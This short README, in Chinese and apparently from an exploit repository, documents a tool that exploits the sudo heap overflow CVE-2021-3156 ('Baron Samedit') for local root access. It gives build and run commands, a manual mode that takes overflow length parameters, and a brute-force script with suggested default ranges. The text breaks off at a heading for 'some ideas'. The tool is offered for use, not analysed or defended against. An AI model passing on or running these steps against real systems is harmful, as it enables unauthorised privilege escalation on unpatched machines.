这是针对 CVE-2021-3156 sudo 漏洞的利用程序(被 Qualys 称为 Baron Samedit)。
构建:
$ make
列出目标:
$ ./sudo-hax-me-a-sandwich
运行:
$ ./sudo-hax-me-a-sandwich <target_number>
手动模式:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
确保已安装 GNU parallel。
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
一些默认尝试参数:
$ ./brute.sh 90 120 50 70 150 300
会占满所有可用核心。不要尝试边看 Netflix 边暴力破解。
提交(合理的)PR,我可能会合并。
一些想法: